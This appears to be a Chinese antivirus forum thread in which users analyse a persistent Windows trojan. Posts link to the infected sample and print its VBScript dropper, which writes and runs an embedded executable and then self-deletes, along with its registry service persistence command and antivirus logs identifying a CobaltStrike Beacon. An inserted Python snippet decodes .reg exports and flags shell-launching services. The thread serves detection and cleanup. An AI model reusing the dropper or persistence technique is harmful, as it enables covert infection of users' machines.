Views: 1687 | Replies: 13
[Virus sample] A virus sample that writes itself back at shutdown, suspected rootkit

落华无痕
Posted 2024-3-19 13:12:52
Sample (infected): https://free.lanzoue.com/iCWQS1rvefgf

Huorong's dedicated removal tool can't deal with it, and Kaspersky can't clean it either: in both cases it comes back after a reboot once cleaned. But after deleting the directory from the recovery environment it does not come back.

384也7492374
Posted 2024-3-19 13:24:54
S1 static kill
祸兮福所倚
Posted 2024-3-19 13:32:08
t0kenzero
Posted 2024-3-19 13:44:29
It's probably not a rootkit. Just clear out the registry entries and you'll be fine.
msiserverkj.reg
  cmd /c xcopy "C:\Windows\system32\Microsoft\private-88" "C:\ProgramData\Microsoft Setup" /i /e /y & "C:\ProgramData\Microsoft Setup\userinit.exe" //B //E:vbs "C:\ProgramData\Microsoft Setup\userinit.txt"

userinit.txt
  If Not CreateObject("Scripting.FileSystemObject").FolderExists(Wscript.CreateObject("Shell.Application").NameSpace(&H23).Self.Path + "\Microsoft Setup") Then
  CreateObject("Scripting.FileSystemObject").CreateFolder(Wscript.CreateObject("Shell.Application").NameSpace(&H23).Self.Path + "\Microsoft Setup")
  End If
  Randomize()
  CreateObject("Microsoft.XMLDOM").CreateElement("binary").DataType = "bin.hex"
  CreateObject("Microsoft.XMLDOM").CreateElement("binary").Text = j3437
  CreateObject("ADODB.Stream").Type = 1
  CreateObject("ADODB.Stream").Open
  CreateObject("ADODB.Stream").Write CreateObject("Microsoft.XMLDOM").CreateElement("binary").NodeTypedValue
  CreateObject("ADODB.Stream").SaveToFile Wscript.CreateObject("Shell.Application").NameSpace(&H23).Self.Path + "\Microsoft Setup" + "" + Cstr(round(rnd * 999)) + ".exe", 2
  CreateObject("ADODB.Stream").Close
  If CreateObject("Scripting.FileSystemObject").FileExists(Wscript.CreateObject("Shell.Application").NameSpace(&H23).Self.Path + "\Microsoft Setup" + "" + Cstr(round(rnd * 999)) + ".exe") Then
  Wscript.CreateObject("Wscript.Shell").Run chr(34) + Wscript.CreateObject("Shell.Application").NameSpace(&H23).Self.Path + "\Microsoft Setup" + "" + Cstr(round(rnd * 999)) + ".exe" + chr(34), 1, True
  CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.CreateObject("Shell.Application").NameSpace(&H23).Self.Path + "\Microsoft Setup" + "" + Cstr(round(rnd * 999)) + ".exe")
  End If
  CreateObject("Scripting.FileSystemObject").DeleteFile(CreateObject("Scripting.FileSystemObject").GetFile(Wscript.ScriptFullName).path)
  Wscript.Quit 0

落华无痕
Thread starter | Posted 2024-3-19 13:50:02
t0kenzero posted 2024-3-19 13:44:
It's probably not a rootkit. Just clear out the registry entries and you'll be fine.
msiserverkj.reg

I had already deleted both the registry entries and the folder, checked the background processes and found nothing suspicious, and then it came back again after a reboot.
Only after that did I write a bat to rename the problem folder from inside the recovery environment, and it hasn't come back since.
wowocock
Posted 2024-3-19 15:04:30
落华无痕 posted 2024-3-19 13:50:
I had already deleted both the registry entries and the folder, checked the background processes and found nothing suspicious, and then it came back again after a reboot.
Only after that did I write a bat to go into the recovery environment ...

PT 1

        [RAB]00000110

EngFix :dwFixResult=1, bResult=1

[CAutoRun]Repair By ARR_V
        [70]        C:\ProgramData\Microsoft Setup\userinit.txt
        MD5:a492fab806f79d6ee1d33cd444999749

        径:SYSTEM\CurrentControlSet\Services\msiserverkj

        名:ImagePath

        值:cmd /c xcopy "C:\Windows\system32\Microsoft\private-88" "C:\ProgramData\Microsoft Setup" /i /e /y & "C:\ProgramData\Microsoft Setup\userinit.exe" //B //E:vbs "C:\ProgramData\Microsoft Setup\userinit.txt"

        类别:服务项 处理:移除文件 结果:1
I tested it: scanning and cleaning with 360急救箱 (360 System First Aid Kit) is enough.
GreatMOLA
Posted 2024-3-19 15:20:56
BD

\userinit_txt\userinit_txt\programdata\Microsoft Setup\853.exe - Gen:Suspicious.Cloud.2.wGW@aqqu56di
西风萧雨
Posted 2024-3-19 16:42:37
事件: 对象已删除
用户: DINGDINGPC-MATE\丁丁
用户类型: 活动用户
组件: 病毒扫描
结果: 已删除
结果说明: 已删除
类型: 木马
名称: HEUR:Trojan.Script.Generic
精确度: 启发式分析
威胁级别: 高
对象类型: 文件
对象名称: userinit.txt
对象路径: D:\下载\userinit_txt (1)\userinit_txt\system32\microsoft\private-88
对象的 MD5: A492FAB806F79D6EE1D33CD444999749

DisaPDB
Posted 2024-3-19 18:13:05
Last edited by DisaPDB on 2024-3-19 18:21

The enormously long stretch before this is the shellcode.
  Dim s3533, b3137, v3937
  Set s3533 = Wscript.CreateObject("Shell.Application")
  Set b3137 = CreateObject("Scripting.FileSystemObject")
  Set v3937 = Wscript.CreateObject("Wscript.Shell")
  g3333 = s3533.NameSpace(&H23).Self.Path
  j3735 = g3333 + "\Microsoft Setup"
  q3831 = b3137.GetFile(Wscript.ScriptFullName).path
  If Not b3137.FolderExists(j3735) Then
  b3137.CreateFolder(j3735)
  End If
  Randomize()
  b3839 = j3735 + "" + Cstr(round(rnd * 999)) + ".exe"
  Dim q3335, a3739, d3830
  Set a3739 = CreateObject("Microsoft.XMLDOM")
  Set d3830 = a3739.CreateElement("binary")
  d3830.DataType = "bin.hex"
  d3830.Text = j3437
  Set q3335 = CreateObject("ADODB.Stream")
  q3335.Type = 1
  q3335.Open
  q3335.Write d3830.NodeTypedValue
  q3335.SaveToFile b3839, 2
  q3335.Close
  Set q3335 = Nothing
  Set d3830 = Nothing
  Set a3739 = Nothing
  If b3137.FileExists(b3839) Then
  v3937.Run chr(34) + b3839 + chr(34), 1, True
  b3137.DeleteFile(b3839)
  End If
  b3137.DeleteFile(q3831)
  Set s3533 = Nothing
  Set b3137 = Nothing
  Set v3937 = Nothing
  Wscript.Quit 0
v3937.Run chr(34) + b3839 + chr(34), 1, True generates the payload
Registry entries
  Windows Registry Editor Version 5.00

  [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\msiserverkj]
  "ImagePath"=hex:63,00,6d,00,64,00,20,00,2f,00,63,00,20,00,78,00,63,00,6f,00,70,\
    00,79,00,20,00,22,00,43,00,3a,00,5c,00,57,00,69,00,6e,00,64,00,6f,00,77,00,\
    73,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,4d,00,69,\
    00,63,00,72,00,6f,00,73,00,6f,00,66,00,74,00,5c,00,70,00,72,00,69,00,76,00,\
    61,00,74,00,65,00,2d,00,38,00,38,00,22,00,20,00,22,00,43,00,3a,00,5c,00,50,\
    00,72,00,6f,00,67,00,72,00,61,00,6d,00,44,00,61,00,74,00,61,00,5c,00,4d,00,\
    69,00,63,00,72,00,6f,00,73,00,6f,00,66,00,74,00,20,00,53,00,65,00,74,00,75,\
    00,70,00,22,00,20,00,2f,00,69,00,20,00,2f,00,65,00,20,00,2f,00,79,00,20,00,\
    26,00,20,00,22,00,43,00,3a,00,5c,00,50,00,72,00,6f,00,67,00,72,00,61,00,6d,\
    00,44,00,61,00,74,00,61,00,5c,00,4d,00,69,00,63,00,72,00,6f,00,73,00,6f,00,\
    66,00,74,00,20,00,53,00,65,00,74,00,75,00,70,00,5c,00,75,00,73,00,65,00,72,\
    00,69,00,6e,00,69,00,74,00,2e,00,65,00,78,00,65,00,22,00,20,00,2f,00,2f,00,\
    42,00,20,00,2f,00,2f,00,45,00,3a,00,76,00,62,00,73,00,20,00,22,00,43,00,3a,\
    00,5c,00,50,00,72,00,6f,00,67,00,72,00,61,00,6d,00,44,00,61,00,74,00,61,00,\
    5c,00,4d,00,69,00,63,00,72,00,6f,00,73,00,6f,00,66,00,74,00,20,00,53,00,65,\
    00,74,00,75,00,70,00,5c,00,75,00,73,00,65,00,72,00,69,00,6e,00,69,00,74,00,\
    2e,00,74,00,78,00,74,00,22,00,00,00
  "ObjectName"="LocalSystem"
  "Group"="UIGroup"
  "Start"=dword:00000002
  "Type"=dword:00000010
  "ErrorControl"=dword:00000001

Decoded ImagePath:
  cmd /c xcopy "C:\Windows\system32\Microsoft\private-88" "C:\ProgramData\Microsoft Setup" /i /e /y && "C:\ProgramData\Microsoft Setup\userinit.exe" //B //E:vbs "C:\ProgramData\Microsoft Setup\userinit.txt"
If I remember right, 00000010 is the value that corresponds to a driver, and this service entry is started as LocalSystem, but I didn't see any other related content; I'll leave the exe to the experts to analyze.

360 currently blacklists it.
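As an added example that is not from the thread: a small Python decoder for the kind of .reg export shown above. It joins the backslash-continued hex lines, turns the UTF-16LE bytes back into the ImagePath command, and flags Services keys whose ImagePath launches a shell or script host, which is the persistence pattern this sample uses. The embedded .reg text is constructed from the command string in the post (to_reg_hex re-encodes it the way regedit would), and the indicator token list is an assumption.

```python
import re
# Constructed sample: the service command quoted in the thread, re-encoded by to_reg_hex below.
SAMPLE_CMD = ('cmd /c xcopy "C:\\Windows\\system32\\Microsoft\\private-88" '
              '"C:\\ProgramData\\Microsoft Setup" /i /e /y & '
              '"C:\\ProgramData\\Microsoft Setup\\userinit.exe" //B //E:vbs '
              '"C:\\ProgramData\\Microsoft Setup\\userinit.txt"')
# Tokens marking a service that launches a shell or script host (assumption, not from the thread).
SHELL_TOKENS = ("cmd /c", "xcopy", "//e:vbs", "wscript", "cscript")

def to_reg_hex(value, per_line=25):
    """Render text the way regedit exports it as 'hex:': UTF-16LE bytes plus a NUL terminator,
    comma-separated and wrapped onto continuation lines that end in a backslash."""
    parts = [f"{b:02x}" for b in (value + "\0").encode("utf-16-le")]
    chunks = [",".join(parts[i:i + per_line]) for i in range(0, len(parts), per_line)]
    return "hex:" + ",\\\n  ".join(chunks)

def parse_reg(text):
    """Parse a .reg export into {key: {name: value}}; hex values are decoded as UTF-16LE text."""
    joined = re.sub(r"\\\r?\n\s*", "", text)  # glue continuation lines back together
    keys, current = {}, None
    for line in (ln.strip() for ln in joined.splitlines()):
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
            continue
        m = re.match(r'^"([^"]+)"=(.*)$', line)
        if m is None or current is None:
            continue
        name, val = m.groups()
        if val.startswith('"'):                   # REG_SZ written as a quoted string
            keys[current][name] = val[1:-1].replace("\\\\", "\\")
        elif val.startswith("dword:"):
            keys[current][name] = int(val[6:], 16)
        elif val.startswith("hex"):               # hex: / hex(2): raw bytes, read back as UTF-16LE
            raw = bytes(int(h, 16) for h in val.split(":", 1)[1].split(",") if h)
            keys[current][name] = raw.decode("utf-16-le", "replace").rstrip("\0")
    return keys

def suspicious_services(keys):
    """Return (service name, ImagePath) for Services keys whose ImagePath contains a SHELL_TOKEN."""
    return [(key.rsplit("\\", 1)[-1], str(v.get("ImagePath", "")))
            for key, v in keys.items() if "\\services\\" in key.lower()
            and any(t in str(v.get("ImagePath", "")).lower() for t in SHELL_TOKENS)]

# Constructed .reg text mirroring the entries shown in the post above.
SAMPLE_REG = "\n".join(["Windows Registry Editor Version 5.00", "",
    "[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\msiserverkj]",
    '"ImagePath"=' + to_reg_hex(SAMPLE_CMD), '"ObjectName"="LocalSystem"',
    '"Start"=dword:00000002', '"Type"=dword:00000010'])
```

Running suspicious_services(parse_reg(SAMPLE_REG)) returns the msiserverkj entry with its decoded command; pointing parse_reg at a real `reg export HKLM\SYSTEM\CurrentControlSet\Services` file works the same way.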

Fadouse
Posted 2024-3-19 18:51:36
  Time;Scanner;Object type;Object;Detection;Action;User;Information;Hash;First seen here
  3/19/2024 6:51:17 PM;Real-time file system protection;file;E:\Code\Virus\userinit_txt\programdata\Microsoft Setup\853.exe;a variant of Win64/CobaltStrike.Beacon.AX trojan;cleaned by deleting;LAPTOP\Fadouse;Event occurred on a new file created by the application: C:\Program Files\Bandizip\Bandizip.exe (AB7C5C3728A1B132444C69A31DA61541F2BF4B25).;D541124B2657EE5E80EA4BB3D075D2F036400612;3/19/2024 6:50:42 PM
Copyright © KaFan  KaFan.cn All Rights Reserved.